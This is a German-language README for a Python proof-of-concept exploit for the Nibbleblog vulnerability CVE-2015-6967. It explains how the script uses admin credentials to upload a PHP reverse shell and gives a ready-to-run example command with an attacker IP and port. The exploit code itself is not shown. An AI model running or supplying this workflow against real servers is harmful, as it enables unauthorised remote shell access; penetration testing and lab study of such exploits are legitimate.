
CVE-2015-6967 PoC Exploit
CVE-2015-6967 PoC Exploit
Dieses Python-Skript nutzt eine Schwachstelle in Nibbleblog (CVE-2015-6967) aus, um eine Reverse-Shell auf ein verwundbares Ziel hochzuladen. Das Skript nimmt Benutzereingaben für die Ziel-URL, Benutzeranmeldedaten und Ihre Host-IP/Port entgegen und fährt dann fort, die Schwachstelle auszunutzen, indem es eine PHP-Reverse-Shell hochlädt.
Dieses Skript ist ausschließlich für Bildungszwecke gedacht. Verwenden Sie es NICHT für illegale Aktivitäten. Holen Sie immer die ausdrückliche Genehmigung ein, bevor Sie Schwachstellen auf Systemen testen oder ausnutzen, die Sie nicht besitzen oder für die Sie keine Zugriffsberechtigung haben.
requests-Bibliothekargparse-Bibliothekcolorama-Bibliothekpyfiglet-BibliothekSie können die erforderlichen Abhängigkeiten mit dem folgenden Befehl installieren:
pip install requests colorama pyfiglet
Das Skript erfordert mehrere Parameter zum Ausführen: url: Ziel-Nibbleblog-URL (z.B. http://10.10.14.14/nibbleblog) -U, --user: Benutzername für Nibbleblog-Admin -P, --password: Passwort für Nibbleblog-Admin -p, --host-port: Ihr lokaler Port, mit dem die Reverse-Shell verbunden wird -H, --host-ip: Ihre lokale IP-Adresse, mit der die Reverse-Shell verbunden wird
Beispiel
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100